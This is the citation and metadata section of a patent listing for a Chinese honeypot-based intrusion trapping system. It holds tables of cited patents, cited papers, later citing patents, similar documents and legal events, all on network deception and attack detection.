| CN115659343A (en) * | 2022-12-27 | 2023-01-31 | 北京知其安科技有限公司 | Container attack simulation method and detection method for simulating real attack, and terminal |
Citations (9)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20060059554A1 (en) * | 2004-09-13 | 2006-03-16 | Ofer Akerman | System and method for information technology intrusion prevention |
| CN108156163A (en) * | 2017-12-28 | 2018-06-12 | 广州锦行网络科技有限公司 | Multidimensional deception bait based on Honeypot Techniques realizes system and method |
| CN110674288A (en) * | 2018-06-12 | 2020-01-10 | 蓝盾信息安全技术有限公司 | User portrait method applied to network security field |
| CN110784476A (en) * | 2019-10-31 | 2020-02-11 | 国网河南省电力公司电力科学研究院 | Power monitoring active defense method and system based on virtualization dynamic deployment |
| CN111652658A (en) * | 2020-06-11 | 2020-09-11 | 北京妙医佳健康科技集团有限公司 | Portrait fusion method, apparatus, electronic device and computer readable storage medium |
| CN113014598A (en) * | 2021-03-20 | 2021-06-22 | 北京长亭未来科技有限公司 | Protection method for robot malicious attack, firewall, electronic device and storage medium |
| CN113676472A (en) * | 2021-08-18 | 2021-11-19 | 国网湖南省电力有限公司 | Extensible honeypot source tracing reverse control method in power industry |
| US20210409446A1 (en) * | 2020-06-24 | 2021-12-30 | Fortinet, Inc. | Leveraging network security scanning to obtain enhanced information regarding an attack chain involving a decoy file |
| CN113992435A (en) * | 2021-12-27 | 2022-01-28 | 北京微步在线科技有限公司 | Attack detection tracing method, device and system |
-
2022
- 2022-07-04 CN CN202210776795.XA patent/CN115242466A/en active Pending
Patent Citations (9)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20060059554A1 (en) * | 2004-09-13 | 2006-03-16 | Ofer Akerman | System and method for information technology intrusion prevention |
| CN108156163A (en) * | 2017-12-28 | 2018-06-12 | 广州锦行网络科技有限公司 | Multidimensional deception bait based on Honeypot Techniques realizes system and method |
| CN110674288A (en) * | 2018-06-12 | 2020-01-10 | 蓝盾信息安全技术有限公司 | User portrait method applied to network security field |
| CN110784476A (en) * | 2019-10-31 | 2020-02-11 | 国网河南省电力公司电力科学研究院 | Power monitoring active defense method and system based on virtualization dynamic deployment |
| CN111652658A (en) * | 2020-06-11 | 2020-09-11 | 北京妙医佳健康科技集团有限公司 | Portrait fusion method, apparatus, electronic device and computer readable storage medium |
| US20210409446A1 (en) * | 2020-06-24 | 2021-12-30 | Fortinet, Inc. | Leveraging network security scanning to obtain enhanced information regarding an attack chain involving a decoy file |
| CN113014598A (en) * | 2021-03-20 | 2021-06-22 | 北京长亭未来科技有限公司 | Protection method for robot malicious attack, firewall, electronic device and storage medium |
| CN113676472A (en) * | 2021-08-18 | 2021-11-19 | 国网湖南省电力有限公司 | Extensible honeypot source tracing reverse control method in power industry |
| CN113992435A (en) * | 2021-12-27 | 2022-01-28 | 北京微步在线科技有限公司 | Attack detection tracing method, device and system |
Non-Patent Citations (7)
| Title |
|---|
| BONELEE: "基于威胁情报的攻击组织画像与溯源", Retrieved from the Internet <URL:https://www.cnblogs.com/bonelee/p/13347187.html> * |
| 姚兰;王新梅;: "基于欺骗的网络主动防御技术研究", 国防科技大学学报, no. 03, pages 66 - 68 * |
| 姚兰;钟力;: "基于深度欺骗策略的网络积极防御系统的设计与实现", 高技术通讯, no. 08, pages 798 - 801 * |
| 字节脉搏实验室: "攻击者画像内容分析", Retrieved from the Internet <URL:https://cloud.tencent.com/developer/article/1762685> * |
| 曾子明: "信息推荐系统", 30 June 2020, 武汉大学出版社, pages: 8 * |
| 王祖俪: "网络安全中攻击者画像的关键技术研究", 信息技术与信息化, 25 August 2018 (2018-08-25), pages 143 - 145 * |
| 田盛丰,黄厚宽: "人工智能与知识工程", 31 August 1999, 中国铁道出版社, pages: 3 * |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115632882A (en) * | 2022-12-15 | 2023-01-20 | 北京市大数据中心 | Illegal network attack detection method, computer device and medium |
| CN115632882B (en) * | 2022-12-15 | 2023-05-23 | 北京市大数据中心 | Illegal network attack detection method, computer equipment and medium |
| CN115659343A (en) * | 2022-12-27 | 2023-01-31 | 北京知其安科技有限公司 | Container attack simulation method and detection method for simulating real attack, and terminal |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Alshamrani et al. | A survey on advanced persistent threats: Techniques, solutions, challenges, and research opportunities | |
| Kiwia et al. | A cyber kill chain based taxonomy of banking Trojans for evolutionary computational intelligence | |
| US9356957B2 (en) | Systems, methods, and media for generating bait information for trap-based defenses | |
| Yaacoub et al. | Advanced digital forensics and anti-digital forensics for IoT systems: Techniques, limitations and recommendations | |
| Chapman et al. | Taxonomy of cyber attacks and simulation of their effects | |
| WO2009032379A1 (en) | Methods and systems for providing trap-based defenses | |
| CN115242466A (en) | Intrusion active trapping system and method based on high-simulation virtual environment | |
| Kara et al. | The ghost in the system: technical analysis of remote access trojan | |
| Karthikeyan et al. | Honeypots for network security | |
| Zeid et al. | Investigating the darknet | |
| Aboelfotoh et al. | A review of cyber-security measuring and assessment methods for modern enterprises | |
| Tiwari et al. | Comparitive study of various honeypot tools on the basis of their classification & features | |
| Fraunholz et al. | Introducing FALCOM: A multifunctional high-interaction honeypot framework for industrial and embedded applications | |
| Yadav et al. | A complete study on malware types and detecting ransomware using API calls | |
| Chen et al. | A proactive approach to intrusion detection and malware collection | |
| Alese et al. | Improving deception in honeynet: Through data manipulation | |
| Tiwari | Comparitive Analysis of Various Honeypot Tools on the Basis of Their Classification and Features | |
| CN112637217B (en) | Active defense method and device of cloud computing system based on bait generation | |
| Saini et al. | Defense Against Trojans Using Honeypots. | |
| Felix et al. | Framework for Analyzing Intruder Behavior of IoT Cyber Attacks Based on Network Forensics by Deploying Honeypot Technology | |
| Mphago et al. | The role of deception in securing our cyberspace: Honeypots are a viable option | |
| Rajaboyevich et al. | MOBILE COMMUNICATION SECURITY DEFENSE METHOD BASED ON HONEYPOT TECHNOLOGY | |
| SEHGAL | Tracing Cyber Threats | |
| Renuka et al. | COMPARATIVE STUDY OF CYBER ATTACKS | |
| Rutherford | A Holistic Approach Using Honey Communities For Cyber Event Detection and Protection in Communities and Large Distributed Organizations |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |